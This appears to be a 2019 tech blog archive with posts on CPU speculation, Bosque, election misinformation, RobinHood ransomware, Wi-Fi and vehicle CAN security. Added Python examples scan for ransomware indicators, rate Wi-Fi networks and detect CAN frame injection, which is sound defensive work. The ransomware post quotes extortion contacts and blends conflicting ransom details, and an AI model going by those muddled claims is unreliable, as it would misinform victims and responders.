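As an added illustration (not code from the article), here is a tiny fixed-length ISA with a fetch, decode and execute loop in Python. The opcodes, the 8-bit field layout, the eight registers and the sample program are assumptions chosen to mirror the example in the text: load two values, add them, store the sum, and divide only if the sum was greater than zero. Because every instruction is exactly one 32-bit word, the decoder always knows where the next instruction begins, which is the property of fixed-length ISAs the text describes.

```python
# Each instruction: opcode (8 bits) | field a | field b | field c, 8 bits each.
OPCODES = {"HALT": 0, "LOAD": 1, "STORE": 2, "ADD": 3, "SUB": 4,
           "DIV": 5, "BLEZ": 6, "JMP": 7}
MNEMONICS = {v: k for k, v in OPCODES.items()}
NUM_REGS = 8


def encode(op, a=0, b=0, c=0):
    """Pack one instruction into a 32-bit word; fields must fit 8 bits."""
    for f in (a, b, c):
        if not 0 <= f < 256:
            raise ValueError("field out of range: %r" % f)
    return (OPCODES[op] << 24) | (a << 16) | (b << 8) | c


def assemble(program):
    """program is a list of (mnemonic, a, b, c) tuples with missing fields
    defaulting to 0; negative branch offsets become 8-bit two's complement."""
    words = []
    for instr in program:
        fields = [f & 0xFF for f in instr[1:]] + [0] * (3 - len(instr[1:]))
        words.append(encode(instr[0], *fields))
    return words


def fetch(imem, pc):
    """Fetch stage: read the word at the program counter."""
    if not 0 <= pc < len(imem):
        raise IndexError("fetch outside program memory at pc=%d" % pc)
    return imem[pc]


def decode(word):
    """Decode stage: split the fixed-length word; an unknown opcode is a fault."""
    op = word >> 24
    if op not in MNEMONICS:
        raise ValueError("illegal opcode 0x%02x" % op)
    return MNEMONICS[op], (word >> 16) & 0xFF, (word >> 8) & 0xFF, word & 0xFF


def signed8(x):
    return x - 256 if x > 127 else x


def run(imem, dmem, max_cycles=10000):
    """Execute until HALT, one instruction per cycle (no pipelining).
    Returns (registers, data memory, cycles); dmem is updated in place."""
    regs = [0] * NUM_REGS
    pc = 0
    cycles = 0
    while True:
        if cycles >= max_cycles:
            raise RuntimeError("cycle budget exhausted (runaway program?)")
        op, a, b, c = decode(fetch(imem, pc))
        cycles += 1
        next_pc = pc + 1
        if op == "HALT":
            break
        elif op == "LOAD":      # rA <- dmem[b]        (memory instruction)
            regs[a] = dmem[b]
        elif op == "STORE":     # dmem[b] <- rA
            dmem[b] = regs[a]
        elif op == "ADD":       # rA <- rB + rC        (arithmetic)
            regs[a] = regs[b] + regs[c]
        elif op == "SUB":
            regs[a] = regs[b] - regs[c]
        elif op == "DIV":       # integer division; divide by zero is a fault
            if regs[c] == 0:
                raise ZeroDivisionError("DIV by zero at pc=%d" % pc)
            regs[a] = regs[b] // regs[c]
        elif op == "BLEZ":      # branch if rA <= 0, offset relative to next_pc
            if regs[a] <= 0:
                next_pc += signed8(c)
        elif op == "JMP":
            next_pc += signed8(c)
        pc = next_pc
    return regs, dmem, cycles


# The example from the text: add two memory values, store the sum, then
# divide only when the sum is greater than zero.
PROGRAM = assemble([
    ("LOAD", 1, 0),        # r1 <- dmem[0]
    ("LOAD", 2, 1),        # r2 <- dmem[1]
    ("ADD", 3, 1, 2),      # r3 <- r1 + r2
    ("STORE", 3, 2),       # dmem[2] <- r3
    ("BLEZ", 3, 0, 3),     # if r3 <= 0, skip the next three instructions
    ("LOAD", 4, 4),        # r4 <- dmem[4] (the divisor)
    ("DIV", 5, 3, 4),      # r5 <- r3 / r4
    ("STORE", 5, 3),       # dmem[3] <- r5
    ("HALT",),
])


def run_example(a, b, divisor=2):
    """Constructed data memory layout: [a, b, sum slot, quotient slot, divisor].
    Returns (stored sum, stored quotient, cycles taken)."""
    _, dmem, cycles = run(PROGRAM, [a, b, 0, 0, divisor])
    return dmem[2], dmem[3], cycles
```

With inputs 5 and 7 the branch falls through and the quotient slot receives 6; with -10 and 3 the branch is taken, the division never runs, and the program finishes in fewer cycles. That taken-or-not decision is exactly what a real pipeline has to guess ahead of time, which is where branch prediction and the speculation discussed below come in.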
The entire instruction cycle is a very tightly choreographed process, but not all instructions take the same time to complete. For example, an addition is very quick, whereas a division or a load from memory can take hundreds of cycles. Rather than stalling the entire processor while one slow instruction finishes, most modern processors execute out of order: they determine which instructions would be most beneficial to execute at a given moment, and if the current instruction is not ready, the processor jumps ahead in the code to see if anything else is ready.
In addition to out-of-order execution, typical modern processors use what is called a superscalar architecture. This means that at any one time the processor is executing several instructions at once in each stage of the pipeline, and may have hundreds more waiting to begin execution. To execute many instructions at once, processors have several copies of each pipeline stage. When a processor sees two instructions that are ready to execute and have no dependency between them, it executes both simultaneously instead of waiting for each to finish individually.
Speculation, the ability to execute instructions that are ready instead of waiting on earlier ones that are busy, provides huge performance gains, but it also exposes security vulnerabilities. The well-known Spectre attack exploits flaws in branch prediction and speculation: the attacker uses specially crafted code to make the processor speculatively execute instructions that leak memory values. Some aspects of speculation had to be redesigned so that data could not be leaked, and performance dropped slightly as a result.
The architecture used in modern processors has come a long way in recent decades. Innovations and smart design have led to greater performance and better use of the underlying hardware. CPU makers are very secretive about the technology in their processors, so it is impossible to know exactly what is going on inside. That said, the fundamental principles of how computers work are the same across all processors. Intel may add its secret sauce to increase cache hit rates, or AMD may add an advanced branch predictor, but both follow the same basic model.

Read More

22

April, 2019

MICROSOFT'S NEW PROGRAMMING LANGUAGE: BOSQUE

What is Bosque:

Bosque combines syntax from TypeScript and ML with the semantics of JavaScript. In short, anyone who has ever built a front-end app will find the language familiar. ...
The language has both nominal and structural types.
The Bosque programming language is a Microsoft Research project that explores language concepts for writing code that is simple, obvious and easy to reason about. Its key design features give developers ways to avoid accidental complexity in the development and coding process.
The result is improved developer productivity, improved software quality, and new compiler and tooling experiences. The project is organised around an open source (MIT-licensed) GitHub repository to facilitate cooperation with other researchers and the wider developer community.
The project welcomes contributions from the community, including issues, comments, pull requests and research based on or improving the Bosque language. Marron explains in his technical paper: "This model builds upon the achievements of structured programming and abstract data types by simplifying existing programming models into a regularized form that eliminates major sources of error."
It simplifies code understanding and modification, and turns many automated reasoning tasks into trivial propositions. Bosque follows a functional model with immutable data: all values are immutable. Because the language is free of side effects, the Bosque documentation states, reasoning about the effect of a block of code is simplified. Functional languages have long benefited from the simplified program development, sophisticated tooling and compiler optimisations that this model makes possible.
Lambda constructors combine the definition of the lambda's code with variable copy semantics, closing over the captured variables at the point the lambda is created. A simple, unopinionated type system lets a range of structural, combination and nominal types be used to communicate intent and encode the relevant features of the problem domain.
Named arguments, as well as rest and spread operators, are provided; they let code manipulate data as part of calls and constructor operations.
Bulk algebraic data operations start with bulk reads and updates of data values. These operators help focus code on the overall intent and allow developers to reason algebraically about operations on data structures.
Algebraic operations are provided for tuples, records and nominal types, and include projection, multi-update and merge.
Structured loops are replaced by high-level iterative processing constructs. Removing this boilerplate eliminates classes of errors, such as bounds calculations, and makes intent clear.

Bosque becomes Microsoft's latest language project, following C#, an object-oriented language, F#, a functional language, and TypeScript, a typed superset of JavaScript. The software giant has had a good deal of success in developing languages.

Bulk Algebraic Data Operations:

Bosque starts with bulk algebraic operations: bulk reads and updates of data values. Beyond eliminating the chance of forgetting or confusing a field, these operators help focus the code on the overall aim instead of burying it in individual steps.
For example:
@[7, 9]
(@[7, 8])=~(0=5, 3=1);              // @[5, 8, none, 1]
(@[7, 8])=+(@[5]);                   // @[7, 8, 5]
(@{f=1, g=2})@{f, h};                // @{f=1, h=none}
(@{f=1, g=2})=~(f=5, h=1);          // @{f=5, g=2, h=1}
(@{f=1, g=2})=+(@{f=5, h=1});       // @{f=5, g=2, h=1}
Baz@identity(1)@{f, h};              // @{f=1, h=true}
Baz@identity(1)@{f, k};              // error
Baz@identity(1)=~(f=5);              // Baz@{f=5, g=1, h=true}

None Processing:

No value is ever null or undefined in Bosque; there is a single none value instead. Bosque supports the "elvis" operator ?. on all chainable operations, and provides an explicit none-coalescing operator ?| rather than following JavaScript's truthiness-based coalescing.
@{}.h             // none
@{}.h.k           // error
@{}.h?.k          // none
@{h={}}.h?.k      // none
@{h={k=3}}.h?.k   // 3
function default(x?: Int, y?: Int): Int {
    return (x ?| 0) + (y ?| 0);   // default on none
}


Atomic Constructors:
The language also regularises the construction of atomic values. This is achieved through "direct field initialization to build the value of the entity."

For example:
concept Bar {
    field f: Int;
    factory default(): {f: Int} {
        return @{f=1};
    }
}
entity Baz provides Bar {
    field g: Int;
    field h: Bool = true;
}


A Side By Side Comparison:
Comparing JavaScript and Bosque side by side shows what Marron means by eliminating "accidental complexity". As a regularised programming language, Bosque aims to make the style of JavaScript and other structured programming languages more declarative and concise.

Conclusion:
Bosque presents an interesting paradigm shift in the wider field of programming. It will be worth watching how the language matures as a tooling ecosystem develops around it. Microsoft has released the language as open source under an MIT license, and you can explore Bosque in Microsoft's GitHub repository.

Read More

20

April, 2019

Instagram is now a hotbed for falsified news & misinformation

The voluntary 'ethics code' for the general elections issued by the EC does not mention Instagram separately. ...
Instagram has become a hotbed for false news and misinformation in recent weeks, experts say, raising concerns about whether the Election Commission is properly monitoring the Facebook-owned photo and video-sharing platform for objectionable political content.
The voluntary 'ethics code' for the general elections issued by the EC does not cover Instagram separately, even though its sister company WhatsApp is named, say analytics companies, strategists and fact-checkers. Whether the platform is monitored at all is unclear, they said.
Prashant Puri, CEO of digital marketing company AdLift, said: "Our analysis shows that the number of political posts on Instagram is on the rise. The most popular hashtags on Instagram include the ones which revolve around BJP, Congress, Narendra Modi, Rahul Gandhi, AAP and Samajwadi Party. These Instagram handles have followers ranging from a few hundred to tens of thousands." #Abhoganyay, #Congesshaina and #Namoagain have been some of the most used hashtags. False news and misinformation are abundant.
"They are Congress and SP workers, who have been arrested and accused of beating Kashmiri youth in saffron clothes," claimed one post on the Modi Again account. Another handle, called Narendra Modi Indian, claimed that 89 percent of PM Modi's 2014 commitments have been fulfilled or are in progress according to a BBC report. The BBC did not report this.
The same handle, which had more than 3.5 lakh followers, also said the nation lost the "iron man" Sardar Vallabhbhai Patel to the "colourful" Nehru and to the "mute" Manmohan Singh, and should not lose Narendra Modi to "the silly Pappu" now. Hashtags such as Narendra Modi, Congress, BJP and Rahul Gandhi have generated over 16 lakh posts.
In response to ET's questions, Instagram stated that the Election Commission has not asked the company to remove any objectionable content, and that no accounts or posts linked to false news and misinformation about political parties and candidates have been removed from the platform. The Election Commission had not answered ET's queries at the time of publication.
During the 48-hour silence period before the first phase of polling, around 500 Facebook posts and links and two posts on Twitter were taken down, according to EC officials. One WhatsApp number was also deactivated, but Instagram has not been mentioned so far.
Shammas Oliyath, founder of Check4Spam, a non-profit that verifies posts on social media, said: "It's surprising, if true, that Instagram may not be monitored for fake polling posts." "For images already found and flagged on other social channels, reporting them on Instagram should also be straightforward. I understand, however, that extracting the text and then verifying it is more work for memes/trolls than any manual effort may allow during the season," he added.
"I think EC ought to have been much more proactive on social media, and EC overstated the strength of social media today, too," said Oliyath. Priyanka Jha, a researcher at Alt News, said a lot of false news is circulating on Instagram. "Fake news and unreasonable content on Instagram is not monitored," she said. "There is a lot of unnoticed misinformation on the platform, and there are a lot of pages and stories about divisive politics and propaganda currently in circulation, and this content has certainly been uploaded late."
On Tuesday, IMAI said its social media intermediary members have committed to supporting India's Election Commission in holding free and fair elections. The 48-hour 'silence period' is very critical for that purpose, it said, for participants in the 2019 Voluntary Code of Ethics for the General Election.
Under the voluntary code of ethics, participating companies such as BIGO, ByteDance, Facebook/WhatsApp, Google, ShareChat and Twitter have established a high-priority channel to communicate with the nodal officers designated by the EC, the association says. Participants also agreed to act expeditiously, in accordance with the law, on content reported by the nodal officer.

Read More

18

April, 2019

Robin Hood Ransomware

What Is Robin Hood Ransomware

There are many surprises in the world of cybersecurity. From the use of Game of Thrones to the exploitation of popular ...
porn sites, cyber criminals continue to find new ways to harm you.
In a related development, the RobinHood ransomware is wreaking havoc in North Carolina, where most of a city's PCs have been crippled by it. The FBI and local authorities are currently investigating the matter.
What is interesting about RobinHood are the surprising statements by its creators. The ransomware's payment page states that the developers are concerned with users' privacy: "Your privacy is important to us and after your payment we will remove all your records, including your IP and encryption keys." The page also claims that a fresh bitcoin address is created for each victim's ransom payment, and that it therefore cannot be tracked.
Not much is known about this ransomware, and a sample of RobinHood has still not been found. We have, however, seen the ransom notes and encrypted files of various victims, so we can build an overview of how it works. The attackers emphasise that the victim's privacy is important to them and that they will not disclose the victims who paid.
But it is unlikely that any portion of the ransom collected is actually passed on to charities. A representative of Heimdal Security (a Danish cybersecurity software vendor) pointed out in this regard: "We can't trust cyber criminals, who can't tell the truth, to (currently) have a kind and generous side."
The creators of the "Robin Hood" ransomware are asking their victims to pay for the fraudsters' "good intentions". It is worth mentioning that many fraudsters exploit children for illegal purposes.


RobinHood Targets Networks

Judging by the text of the ransom note, the RobinHood attackers actively try to gain access to networks. Once they have access, they try to encrypt as many computers on the network as possible. While nothing is known about the encryption used, we know that encrypted files are renamed in the form Encrypted_b0a6c73e3e434b63.enc_robinhood.
The ransomware also drops ransom notes under four different names: Decryption_ReadMe.html, Decrypt_Files.html, Help_Help_Help.html and Help_Important.html. These notes include information about the encrypted files, the ransom amount, and links to TOR sites where the victim can leave a message for the attackers or decrypt 3 files of up to 10 MB free of charge.
The current addresses used in the ransom note are:
http://xbt4titax4pzza6w.onion/
https://xbt4titax4pzza6w.onion.pet/
https://xbt4titax4pzza6w.onion.to/
The notes demand different amounts depending on whether a single computer or the whole network is to be decrypted. For instance, in the ransom note seen by Bleeping Computer, the rate was 3 bitcoins per computer or 7 bitcoins for the whole network. It also states that the ransom grows by $10,000 per day after the fourth day.
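The indicators above (the renamed-file pattern, the four note names and the .onion addresses) are enough for a first-pass triage script. The following Python is an added example, not from the original post: it scans a constructed file listing, counts renamed files per directory, finds the notes and extracts the .onion contact hosts from their text, including the .onion.pet and .onion.to web-proxy forms. It assumes the notes are .html files whose on-disk names use underscores where the text above shows spaces, and it matches any 16-hex-character encrypted file name rather than only the one observed.

```python
import re
from collections import Counter

# Indicators from the write-up. The encrypted-file name is matched on its
# shape (16 hex characters, then the extension) so that every victim file
# matches, not only the one example.
ENCRYPTED_NAME = re.compile(r"^Encrypted_[0-9a-f]{16}\.enc_robinhood$", re.IGNORECASE)
# Assumption: the notes are HTML files; names are compared in a normalised
# form (lower case, underscores as spaces) so either spelling is caught.
NOTE_NAMES = {"decryption readme.html", "decrypt files.html",
              "help help help.html", "help important.html"}
KNOWN_ONIONS = {"xbt4titax4pzza6w.onion"}
# Captures the hidden-service host and tolerates a .pet / .to proxy suffix.
ONION_URL = re.compile(r"https?://([a-z2-7]{16,56}\.onion)(?:\.[a-z]+)?/?", re.IGNORECASE)


def split_path(path):
    """Return (directory, basename) for Windows or POSIX style paths."""
    p = path.replace("\\", "/")
    directory, _, base = p.rpartition("/")
    return directory, base


def scan_listing(entries):
    """entries: iterable of (path, content) pairs, content being the text of
    the file or None when it was not read. Returns a summary a responder can
    act on: how many files were renamed and where, which notes were dropped,
    and which .onion hosts the notes point to."""
    encrypted = Counter()   # directory -> number of encrypted files
    notes = []
    onions = set()
    for path, content in entries:
        directory, base = split_path(path)
        if ENCRYPTED_NAME.match(base):
            encrypted[directory] += 1
        elif base.lower().replace("_", " ") in NOTE_NAMES:
            notes.append(path)
            if content:
                onions.update(h.lower() for h in ONION_URL.findall(content))
    return {
        "encrypted_files": sum(encrypted.values()),
        "encrypted_dirs": dict(encrypted),
        "ransom_notes": notes,
        "onion_hosts": sorted(onions),
        "known_infrastructure": bool(onions & KNOWN_ONIONS),
    }


def is_robinhood_hit(summary):
    """Flag the host when notes are present or any file carries the extension."""
    return bool(summary["ransom_notes"]) or summary["encrypted_files"] > 0


# Constructed listing of a victim workstation; the second hex name and the
# note text are made up for the example.
SAMPLE_LISTING = [
    (r"C:\Users\finance\Documents\Encrypted_b0a6c73e3e434b63.enc_robinhood", None),
    (r"C:\Users\finance\Documents\Encrypted_1f2e3d4c5b6a7988.enc_robinhood", None),
    (r"C:\Users\finance\Documents\budget.xlsx", None),
    (r"C:\Users\finance\Desktop\Decryption_ReadMe.html",
     "<p>Contact us at http://xbt4titax4pzza6w.onion/ or https://xbt4titax4pzza6w.onion.pet/</p>"),
    (r"C:\Users\finance\Desktop\Help_Important.html", None),
]

if __name__ == "__main__":
    result = scan_listing(SAMPLE_LISTING)
    print(result)
    print("RobinHood indicators present:", is_robinhood_hit(result))
```

Extracting the contact host from the note rather than hard-coding it means a note pointing at new infrastructure is still collected as an indicator; the known_infrastructure flag only tells you whether it matches the addresses reported so far.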


How to Remove RobinHood Ransomware:

The RobinHood virus is an interesting ransomware product which was supposedly created to protest against Crown Prince Mohammed bin Salman of Saudi Arabia over the war in Yemen. The hackers demand an atrocious 5 bitcoins with no guarantee that the encrypted data can be decrypted.
Don't be misled; this modern Robin Hood is probably a group of hackers who don't really care about politics but are more interested in extorting money. Trust us, these crooks will take your money and laugh all the way to the bank. Therefore, RobinHood removal should not be delayed.
Besides sending the criminals over $13,000, the victims have two other options: give up all their sensitive information, or post a message condemning the Saudi leader's war in Yemen and get 100 people to retweet it.
The transcript of the full note called READ_IT.txt is provided below:
HELP YEMEN
Bin Salman of Saudi Arabia is killing poor and innocent people of Yemen by bombing, creating famine and disease! You, as a Saudi or a supporter of their activities, are a partner in his homicide. So you have been subjected to a ransomware attack and must accept one of the following:
a) Giving up all your information
b) Pay five Bitcoins to help Yemeni people.
bitcoin address = 1ENn1BelaKXBotiGuAFE1Yrin3e3vBjUAQH
and send transaction link to: decrypter.files@gmx.com
c) Use Twitter to condemn Bin Salman for his crimes and ask him to stop the war against Yemen and make 100 users retweet.
If you are a regular home user, we doubt you are willing to hand your savings to hackers who can simply use this scheme to make easy money. You may want to try the Twitter option, but do not give your personal information to anyone, even if you desperately need your files.
The safer option is to remove the RobinHood virus from the computer and recover the encrypted data by other means. To complete the removal, you can rely on Reimage or other trusted antivirus software.

Read More

17

April, 2019

The brain is separated from the brawn by a software-defined future

Today, consumers are increasingly leasing, streaming and renting products and services that enhance and add value to their lives, rather than buying physical goods. ...
Why does this happen? Because it meets your needs today and lets you change your preferences tomorrow.
This demand for flexibility extends into the world of business IT. Rigid hardware architectures restrict the ability to react and adjust to changing business conditions, and the unknown becomes a challenge. This is why software-defined technologies now power transformative corporate solutions such as edge computing, cloud, virtualisation and containers. IT organisations fear long-term hardware commitments; they seek innovative technologies that give them the flexibility to deliver their products and services today while adjusting and planning for tomorrow.


Software intelligence

Software-defined infrastructure is about abstracting the control plane from the underlying hardware. When the system's brains are separated from its brawn, the options for the underlying hardware grow: it becomes cheaper and more interchangeable, while the software as a whole becomes more capable, faster to evolve, and more adaptable to a changing environment.
Companies with on-premises clouds and software-defined infrastructure have three basic needs: friction-free agility for physical resources, control systems that maximise the use of those resources and the return on investment, and an integrated resource management infrastructure.
The entire range of corporate infrastructure (compute, storage and network) shares these requirements, but the network is essential because it acts as the glue between compute and storage. This means that a company's ability to deliver optimised applications is influenced directly by the agility, control and integration of its network, or the absence of them. If the network constantly gets in the way, the business loses its agility.


The case for software-defined networking

More than 30% of organisations have software-defined technologies in place today, according to the consulting firm Nemertes Research. The main driver behind this trend is the need to automate and reduce the time required to operate the infrastructure; cloud-driven IT consumption patterns, for example IT-as-a-service in public and private cloud scenarios, fit this model.
The simplest way to describe software-defined networking is that it allows enterprise IT to manage data traffic from a central console instead of manually configuring each individual switch. In a traditional network, switches forward data in the same direction and in exactly the same way, but with software-defined networking traffic can be steered in any direction. This flexibility enables IT to update switching rules to optimise performance and to conform to new needs and priorities.
With software-defined networking, enterprise IT can take a more responsive approach to traditional networking challenges such as latency, performance bottlenecks and geographic boundaries. It can also adapt to future demands such as scalability and automation.
As companies move closer to a fully digital state, they seek to increase business agility by making smarter compute, storage and networking choices. The transition from traditional "brawny" data centres to software-defined technologies is a crucial way to save time and resources, allowing companies to update services on their own terms for tomorrow.


16

April, 2019

Oops... We have insecure Wi-Fi

It has been many years since the internet came into existence, and people figured out ways to access it. At first, dial-up modems were used to access the internet, then came broadband connections, and a few years down the road came wireless routers and access points that enabled a person to access either a local network or the internet wirelessly. This blog discusses the wireless technologies used to connect to a wireless network and the security implications that come along with them.
A wireless network is a type of computer network in which the devices connect to one another through a wireless access point or an ad-hoc network; in the case of Wi-Fi, access points are the norm. The link created between a wireless access point and the devices that connect to it is called a wireless connection, and several different networking protocols can be used to establish that connection.
For Wi-Fi, the protocols most commonly used are Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA), Wi-Fi Protected Access 2 (WPA2), Wi-Fi Protected Access 3 (WPA3) and Wi-Fi Protected Setup (WPS). All of these protocols operate differently and are implemented differently in the devices that use them, and they provide varying levels of security to the wireless connection. In fact, one could easily say that each subsequent protocol was created because the previous one had some sort of security flaw.
WEP was the first protocol used to secure wireless access points, but it was found to have a major flaw in the way it was implemented: attackers could decrypt network traffic using statistical analysis methods, and could even inject bogus traffic from unauthorised devices into the traffic stream. To take care of WEP's flaws, the WPA protocol was created as a stopgap until the WPA2 protocol was released. WPA2 is similar to WPA except that it uses CCMP for its cryptographic functions, while WPA uses TKIP. WPA3 is the latest protocol for securing access points. It was launched to replace WPA2, which was found to have a severe security flaw known as the KRACK vulnerability that can allow attackers to perform man-in-the-middle attacks and steal sensitive information.

Whether in an office, a restaurant or at home, people around the world use Wi-Fi to access the internet, and a cyber-attack on this technology could cause severe damage to people's security and privacy. Take the KRACK vulnerability in WPA2, for example: threat actors could exploit it to steal the sensitive data of people or organisations, including credit card information, usernames, passwords, emails, personal chat messages, private photographs and other sensitive information. What makes this vulnerability a cause of major concern is that WPA2 has been around for more than 15 years, so the vast majority of wireless access points and client devices that use it have been affected, and attackers are exploiting the vulnerability for their own gain.
Recently, news came out of the blue that a group of security vulnerabilities had been discovered in the WPA3 protocol. Imagine that: the protocol has been around for only about a year, has not even reached many devices yet, and vulnerabilities have already been found in it. In reality, this is both a good and a bad thing. Good, because not many devices use WPA3 yet, so they are not exposed to those specific vulnerabilities. Bad, because the devices that have already started using WPA3 could put the people or organisations that use them at risk of attack by cyber-criminals.
This shows one thing: companies need to step up their game when they develop something new and make sure they do it securely, so that people don't fall prey to adversaries.
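The protocol ranking above (open and WEP as critical, WPA-only as high risk, WPA2 with TKIP still negotiable as medium, WPA2-CCMP and WPA3 as acceptable) can be turned into a simple site audit. The script below is an added defender's example, not code from the original post; the scan lines are constructed, and the only assumption about the real tool is the field layout of `nmcli -t -f SSID,SECURITY,WPA-FLAGS,RSN-FLAGS device wifi list`.

```python
"""Rate the link-layer security of nearby Wi-Fi networks from a scan listing.

Added example, not from the original post. Input is the terse output of the
NetworkManager command
    nmcli -t -f SSID,SECURITY,WPA-FLAGS,RSN-FLAGS device wifi list
(fields separated by ':', literal colons inside a value escaped as '\\:').
The SSIDs and flag values in SAMPLE_SCAN are constructed for this demo.
"""
from dataclasses import dataclass
from typing import List

SAMPLE_SCAN = """\
CoffeeShop:::
LegacyOffice:WEP::
HomeRouter:WPA1 WPA2:pair_tkip group_tkip psk:pair_ccmp pair_tkip group_tkip psk
GuestNet:WPA2::pair_ccmp group_ccmp psk
Lab\\:5G:WPA3::pair_ccmp group_ccmp sae
"""


@dataclass
class Finding:
    ssid: str
    rating: str  # one of: critical, high, medium, ok
    reason: str


def rate_network(ssid: str, security: str, wpa_flags: str, rsn_flags: str) -> Finding:
    """Map one network's scan fields to a rating, weakest problem first.

    WPA-FLAGS describe the WPA (v1) information element, RSN-FLAGS the WPA2/WPA3
    one; 'pair_*' is the pairwise cipher, 'psk'/'sae' the key-management method.
    """
    sec = security.upper().split()
    rsn = rsn_flags.lower().split()
    if not sec or sec == ["--"]:
        return Finding(ssid, "critical", "open network: frames are not encrypted")
    if "WEP" in sec:
        return Finding(ssid, "critical", "WEP: keys recoverable by statistical analysis of traffic")
    if "WPA3" in sec or "sae" in rsn:
        note = " (transition mode, WPA2-PSK still offered)" if "psk" in rsn else ""
        return Finding(ssid, "ok", "WPA3/SAE" + note)
    if "WPA2" not in sec:
        return Finding(ssid, "high", "WPA (v1) only: TKIP cipher, superseded by WPA2")
    if "pair_tkip" in rsn or "WPA1" in sec:
        return Finding(ssid, "medium", "WPA2 mixed mode: TKIP still negotiable, prefer CCMP-only")
    return Finding(ssid, "ok", "WPA2-CCMP: acceptable if AP and clients carry the KRACK patches")


def parse_scan(text: str) -> List[Finding]:
    """Parse nmcli terse lines into Findings; an escaped '\\:' in an SSID is kept."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.replace("\\:", "\x00").split(":", 3)
        fields += [""] * (4 - len(fields))          # trailing empty fields may be dropped
        ssid, security, wpa_flags, rsn_flags = (f.replace("\x00", ":") for f in fields)
        findings.append(rate_network(ssid, security, wpa_flags, rsn_flags))
    return findings


def weakest_first(findings: List[Finding]) -> List[Finding]:
    """Order findings so the networks needing attention come first."""
    order = {"critical": 0, "high": 1, "medium": 2, "ok": 3}
    return sorted(findings, key=lambda f: order[f.rating])


if __name__ == "__main__":
    for f in weakest_first(parse_scan(SAMPLE_SCAN)):
        print(f"{f.rating:8} {f.ssid:14} {f.reason}")
```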


15

April, 2019

What is edge computing

In IIoT, "edge" refers to computing facilities close to data sources, e.g. industrial machines (wind turbines, MR scanners, underwater equipment), industrial controllers (e.g. SCADA systems) and time-series databases aggregating data from a wide range of devices and sensors. Typically, these edge computers are located away from cloud-based central computing.
We're in the cloud computing era, but there is a lot more going on. Those unfamiliar with technical computing jargon may wonder what edge computing is and how it can transform data and networks.
This blog explains the next trend in big data and what computing at the edge means. Like the metaphorical cloud and the internet of things, the edge is a catch-all buzzword.
Edge computing as we know it today dates from the late 1990s, when Akamai launched its content delivery network to relieve web congestion. Akamai, like Cloudflare, runs an edge-based network with edge servers that deliver content closer to the source of the request.
According to the research company IDC, edge computing is a "mesh network of micro data centers that process or store critical data locally and push all received data to a central data center or cloud storage repository, in a footprint of less than 100 square feet".

Benefits of edge computing:

Edge computing solves the problem of latency by solving the problem of proximity. Processing on the device makes it possible to send only non-critical data over the network and to act on critical data immediately.
That is important in latency-sensitive applications like autonomous cars, where milliseconds matter.
The decentralized approach of edge computing increases efficiency and scalability and reduces bandwidth. Data processing begins at the point of collection, and only the necessary data is sent to the cloud.
Edge computing also reduces the impact of outages and intermittent connectivity, because devices do not rely solely on the cloud for processing. This helps avoid server downtime, ensures reliable operations and prevents unexpected outages at remote locations.
In theory, edge computing also adds a layer of security, because much IoT device data never traverses the network; rather, it stays where it was created. Less data in the cloud means fewer opportunities for breaches or leaks.


13

April, 2019

Vehicles and Cyber Security

Vehicles are a precious gift of science to human beings that make the transportation of people and goods over vast distances an easy task. Nowadays, all sorts of vehicles have various gizmos and gadgets fitted inside them that people use to make specific tasks easier while sitting in or driving their vehicles. This blog discusses the technologies used in today's vehicles and the ways attackers can hack into that technology and cause damage.
Vehicle manufacturers nowadays use various technologies inside the vehicles they make to provide a great experience to the people who drive them. Vehicles have built-in navigation systems, safety features like electronic airbags, electronically controlled steering and several other electronic features that are connected to the vehicle's onboard computer system, which controls everything those electronic devices do. Cars, trucks and many other commercial vehicles have a built-in computer system that controls the operation of the vehicle, such as the brakes, fuel management, acceleration and steering.
A controller area network inside the vehicle enables the microcontrollers and other devices present in the vehicle to communicate with each other and perform specific functions. The controller area network, or CAN, is a vehicle bus standard and a message-based protocol designed for multiplex electrical wiring within automobiles. CAN controls almost everything that happens inside a vehicle, from the brakes to the indicators and headlamps. Attackers can take advantage of a vulnerability in the controller area network and, with a sophisticated attack, cause massive damage to people and property.
An example of a vehicle hack would be an attacker hacking into the CAN of a self-driving car whose accelerator pedal is also controlled by the controller area network. The attacker could make the car accelerate while the person is driving in a crowded street and cause it to hit a group of pedestrians, hit other cars or damage property. Such an attack could cause significant financial loss to the victims, or cost them their lives in the resulting accident.
Another type of attack would be an attacker hacking into the car's systems remotely from far away and, while the victim is driving, manipulating the braking system, unlocking the doors and altering the information displayed on the car's screen. The false information could lull the driver into a false sense of security, so the driver keeps on driving. Now that the braking system has been interfered with, the attacker could apply the brakes while the victim is on a highway and cause a massive crash and pile-up, with severe damage to property and probably loss of life for those involved.
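Because CAN is a broadcast, message-based bus with no sender authentication, a common defensive control is to watch for frames of a normally periodic ID arriving far sooner than that ID's usual period, which is how an injected message typically shows up. The detector below is an added example, not code from the original post: it parses `candump -l` style log lines, learns each ID's period from an initial window assumed clean, and flags the anomalous frames. The interface name, arbitration IDs, periods and payloads are constructed for the demonstration.

```python
"""Frequency-based injection detector for CAN bus traffic.

Added example, not from the original post. Most CAN frames on a vehicle bus are
periodic and the bus has no sender authentication, so a frame of a known ID
arriving far sooner than that ID's normal period is a classic sign of an
injected (spoofed) message. Log format is the one written by `candump -l`
(SocketCAN); the interface name, arbitration IDs, periods and payloads below
are constructed for this demonstration.
"""
import re
from collections import defaultdict
from statistics import median
from typing import Dict, List, Optional, Tuple

Frame = Tuple[float, int, bytes]  # (timestamp, arbitration id, payload)

# e.g. "(1554000000.010000) can0 0C4#1A2B3C4D"
LINE_RE = re.compile(
    r"^\((?P<ts>\d+\.\d+)\)\s+(?P<iface>\S+)\s+(?P<id>[0-9A-Fa-f]{3,8})#(?P<data>[0-9A-Fa-f]*)$"
)


def parse_line(line: str) -> Optional[Frame]:
    """Parse one candump log line; returns None for malformed or non-data frames."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return float(m["ts"]), int(m["id"], 16), bytes.fromhex(m["data"])


def build_sample_log() -> List[str]:
    """Constructed traffic: ID 0x0C4 every 10 ms and 0x1A0 every 50 ms for 3 s,
    plus a burst of 20 spoofed 0x0C4 frames 1 ms apart starting at t = 2.5005 s."""
    base = 1554000000.0
    lines = [f"({base + i * 0.010:.6f}) can0 0C4#0000" for i in range(300)]
    lines += [f"({base + i * 0.050:.6f}) can0 1A0#00" for i in range(60)]
    lines += [f"({base + 2.5005 + i * 0.001:.6f}) can0 0C4#FFFF" for i in range(20)]
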